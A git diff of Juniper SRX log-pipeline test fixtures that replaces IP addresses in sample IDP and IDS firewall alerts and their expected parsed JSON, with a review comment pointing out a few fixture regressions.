@@ -356,13 +355,13 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-11-25T09:37:26.894220762Z", - "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"1.128.3.4\" source-port=\"45610\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", + "ingested": "2021-12-09T13:40:54.976996500Z", + "original": "\u003c165\u003e1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.19.13.11\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" 
outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2007-02-15T09:17:15.719Z", "action": "security_threat", @@ -387,7 +386,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "notification" @@ -395,12 +394,12 @@ "destination": { "nat": { "port": 0, - "ip": "216.160.83.57" + "ip": "172.16.1.10" }, "port": 80, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "IPS", @@ -414,7 +413,7 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -464,10 +463,9 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1", + "67.43.156.14", "0.0.0.0", - "216.160.83.57" + "172.16.1.10" ] }, "client": { 
@@ -477,13 +475,13 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-11-25T09:37:26.894224138Z", - "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"1.128.3.4\" source-port=\"45610\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", + "ingested": "2021-12-09T13:40:54.977002300Z", + "original": "\u003c165\u003e1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1507845354\" message-type=\"SIG\" source-address=\"67.43.156.14\" source-port=\"45610\" destination-address=\"67.43.156.14\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"9\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"15229\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"TROJAN:ZMEU-BOT-SCAN\" nat-source-address=\"0.0.0.0\" nat-source-port=\"0\" nat-destination-address=\"172.16.1.10\" nat-destination-port=\"0\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" 
inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"sec-zone-name-internet\" source-interface-name=\"reth0.11\" destination-zone-name=\"dst-sec-zone1-outside\" destination-interface-name=\"reth1.1\" packet-log-id=\"0\" alert=\"no\" username=\"N/A\" roles=\"N/A\" message=\"-\"]", "kind": "alert", "start": "2017-10-12T21:55:55.792Z", "action": "security_threat", @@ -503,14 +501,14 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.27.14.203" }, "log": { "level": "notification" }, "destination": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.27.14.203" }, "rule": { "name": "DDOS", @@ -552,13 +550,13 @@ }, "related": { "ip": [ - "175.16.199.1" + "172.27.14.203" ] }, "event": { "severity": 165, - "ingested": "2021-11-25T09:37:26.894227365Z", - "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]", + "ingested": "2021-12-09T13:40:54.977008100Z", + "original": "\u003c165\u003e1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time=\"1319367986\" ddos-application-name=\"Webserver\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" rulebase-name=\"DDOS\" policy-name=\"A DoS-Webserver\" repeat-count=\"0\" message=\"Connection rate exceeded limit 60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", "category": [ 
@@ -576,21 +574,21 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.27.14.203" }, "log": { "level": "notification" }, "destination": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.27.14.203" }, "rule": { "id": "1" }, "source": { "port": 50825, - "ip": "1.128.3.4" + "ip": "192.168.14.214" }, "juniper": { "srx": { 
@@ -643,18 +641,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.14.214", + "172.27.14.203" ] }, "client": { "port": 50825, - "ip": "1.128.3.4" + "ip": "192.168.14.214" }, "event": { "severity": 165, - "ingested": "2021-11-25T09:37:26.894230410Z", - "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"1.128.3.4\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", + "ingested": "2021-12-09T13:40:54.977014300Z", + "original": "\u003c165\u003e1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time=\"1319419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth1.O\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.0\" destination-address=\"172.27.14.203\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", "category": [ 
@@ -672,21 +670,21 @@ { "server": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.30.20.201" }, "log": { "level": "notification" }, "destination": { "port": 80, - "ip": "175.16.199.1" + "ip": "172.30.20.201" }, "rule": { "id": "1" }, "source": { "port": 50825, - "ip": "1.128.3.4" + "ip": "192.168.14.214" }, "juniper": { "srx": { 
@@ -739,18 +737,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1" + "192.168.14.214", + "172.30.20.201" ] }, "client": { "port": 50825, - "ip": "1.128.3.4" + "ip": "192.168.14.214" }, "event": { "severity": 165, - "ingested": "2021-11-25T09:37:26.894233105Z", - "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"1.128.3.4\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"175.16.199.1\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", + "ingested": "2021-12-09T13:40:54.977018600Z", + "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"172.30.20.201\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", "category": [ 
diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log index 7da351f230a..906f671e386 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log 
@@ -1,12 +1,12 @@
-<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.137 attack-name="TCP sweep!" source-address="1.128.3.4" source-port="6000" destination-address="81.2.69.143" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
-<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.36 attack-name="WinNuke attack!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" source-port="3240" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
-<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" source-address="1.128.3.4" source-port="40001" destination-address="81.2.69.143" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.1.1.1.2.40 attack-name="UDP flood!" source-address="1.128.3.4" source-port="40001" destination-address="81.2.69.143" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.1.1.1.2.40 attack-name="ICMP fragment!" source-address="1.128.3.4" destination-address="81.2.69.143" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Record Route IP option!" source-address="1.128.3.4" destination-address="81.2.69.143" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Tunnel GRE 6in6!" 
source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-address="81.2.69.143" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Tunnel GRE 4in4!" source-address="1.128.3.4" destination-address="81.2.69.143" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" destination-address="1.128.3.4" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
-<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" source-address="1.128.3.4" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
-<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name="TCP port scan!" source-address="1.128.3.4" source-port="50630" destination-address="81.2.69.143" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name="FIN but no ACK bit!" source-address="1.128.3.4" source-port="42799" destination-address="81.2.69.143" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="TCP sweep!" source-address="67.43.156.13" source-port="6000" destination-address="67.43.156.14" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
+<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="WinNuke attack!" 
source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" source-port="3240" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
+<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="SYN flood!" source-address="67.43.156.15" source-port="40001" destination-address="67.43.156.12" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name="UDP flood!" source-address="67.43.156.15" source-port="40001" destination-address="67.43.156.15" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name="ICMP fragment!" source-address="67.43.156.15" destination-address="67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Record Route IP option!" source-address="67.43.156.15" destination-address="67.43.156.15" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Tunnel GRE 6in6!" source-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" destination-address="2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name="Tunnel GRE 4in4!" 
source-address="67.43.156.13" destination-address="67.43.156.15" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name="SYN flood!" destination-address="67.43.156.12" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
+<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name="SYN flood!" source-address="67.43.156.15" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
+<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="TCP port scan!" source-address="10.1.1.100" source-port="50630" destination-address="10.1.1.1" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name="FIN but no ACK bit!" source-address="10.1.1.100" source-port="42799" destination-address="10.1.1.1" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log-expected.json
index 023eb07c003..b28e0a37bae 100644
--- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log-expected.json
+++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-ids.log-expected.json
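Review bot: Several rewritten lines now use the same host for both ends of the flow — the UDP flood, ICMP fragment and Record Route entries carry `source-address="67.43.156.15" destination-address="67.43.156.15"`, and the WinNuke and GRE 6in6 lines reuse one IPv6 address for both — so the expected output's `related.ip` collapses to a single element and a pipeline regression that swapped `source.*` and `destination.*` would no longer be caught by this fixture. Keep the two ends distinct within the supported block, e.g. `source-address="67.43.156.13" destination-address="67.43.156.14"`, as the first line already does. The structured-data ID was also rewritten from `junos@2636.1.1.1.2.40` to `junos@67.43.156.15`; 2636 appears to be Juniper's IANA enterprise number rather than an address, so a real SRX will never emit the new form and any SD-ID-based handling in the pipeline is no longer exercised here. Restoring the original per-line SD-IDs (`.137`, `.36`, `.40`, `.129`) keeps the fixture representative while still satisfying the IP-range constraint.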
@@ -3,36 +3,42 @@ { "server": { "port": 1433, - "ip": "81.2.69.143" + "ip": "67.43.156.14" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 1433, - "ip": "81.2.69.143" + "ip": "67.43.156.14" }, "source": { - "port": 6000, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 6000, + "ip": "67.43.156.13" }, "juniper": { "srx": { @@ -63,18 +69,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.13", + "67.43.156.14" ] }, "client": { "port": 6000, - "ip": "1.128.3.4" + "ip": "67.43.156.13" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341232637Z", - "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.137 attack-name=\"TCP sweep!\" source-address=\"1.128.3.4\" source-port=\"6000\" destination-address=\"81.2.69.143\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920961700Z", + "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP sweep!\" source-address=\"67.43.156.13\" source-port=\"6000\" destination-address=\"67.43.156.14\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "sweep_detected", "category": [ 
@@ -161,8 +167,8 @@ }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341252074Z", - "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.36 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920973200Z", + "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "attack_detected", "category": [ @@ -180,36 +186,42 @@ { "server": { "port": 50010, - "ip": "81.2.69.143" + "ip": "67.43.156.12" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 50010, - "ip": "81.2.69.143" + "ip": "67.43.156.12" }, "source": { - "port": 40001, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 40001, + "ip": "67.43.156.15" }, "juniper": { "srx": { 
@@ -240,18 +252,18 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.15", + "67.43.156.12" ] }, "client": { "port": 40001, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341256702Z", - "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.40 attack-name=\"SYN flood!\" source-address=\"1.128.3.4\" source-port=\"40001\" destination-address=\"81.2.69.143\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920980800Z", + "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=\"67.43.156.12\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -269,36 +281,42 @@ { "server": { "port": 53, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { - "port": 40001, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "port": 40001, + "ip": "67.43.156.15" }, "juniper": { "srx": { 
@@ -329,18 +347,17 @@ }, "related": { "ip": [ - "1.128.3.4", - "81.2.69.143" + "67.43.156.15" ] }, "client": { "port": 40001, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "event": { "severity": 11, - "ingested": "2021-11-25T09:37:29.341260449Z", - "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.1.1.1.2.40 attack-name=\"UDP flood!\" source-address=\"1.128.3.4\" source-port=\"40001\" destination-address=\"81.2.69.143\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", + "ingested": "2021-12-10T10:16:16.920986Z", + "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name=\"UDP flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=\"67.43.156.15\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", "category": [ @@ -357,34 +374,40 @@ }, { "server": { - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "log": { "level": "error" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "England", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -0.0931, - "lat": 51.5142 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, - "ip": "81.2.69.143" + "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "as": { - "number": 1221, - "organization": { - "name": "Telstra Pty Ltd" - } + "number": 35908 }, - "ip": "1.128.3.4" + "ip": "67.43.156.15" }, "juniper": { "srx": { 
